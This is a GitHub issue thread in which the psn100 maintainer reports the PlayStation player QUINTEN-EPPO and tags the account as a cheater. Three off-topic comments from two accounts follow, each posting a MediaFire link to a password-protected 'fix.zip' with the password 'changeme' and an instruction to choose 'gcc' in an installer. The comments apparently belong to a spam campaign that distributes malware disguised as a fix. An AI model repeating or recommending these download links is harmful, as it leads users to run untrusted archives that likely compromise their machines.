### ISSUE TITLE
QUINTEN-EPPO (5974474422181705789)

### ISSUE THREAD

**Issue by Ragowit** [Ragowit/psn100#14459]
**Player**
- https://psn100.net/player/QUINTEN-EPPO

**Explanation**
![image](https://github.com/user-attachments/assets/9e8b42e0-6d88-4a7a-b634-845a002d5eb8)

**Comment by Ragowit** [comment]
This player is now tagged as a cheater.

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
